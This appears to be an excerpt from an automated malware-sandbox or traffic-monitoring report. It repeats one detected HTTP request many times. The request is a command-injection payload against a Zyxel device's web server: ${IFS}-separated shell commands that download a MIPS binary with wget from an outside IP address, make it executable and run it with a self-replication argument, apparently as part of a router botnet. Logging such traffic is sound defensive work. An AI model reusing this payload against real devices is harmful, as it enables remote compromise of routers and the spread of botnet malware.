            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
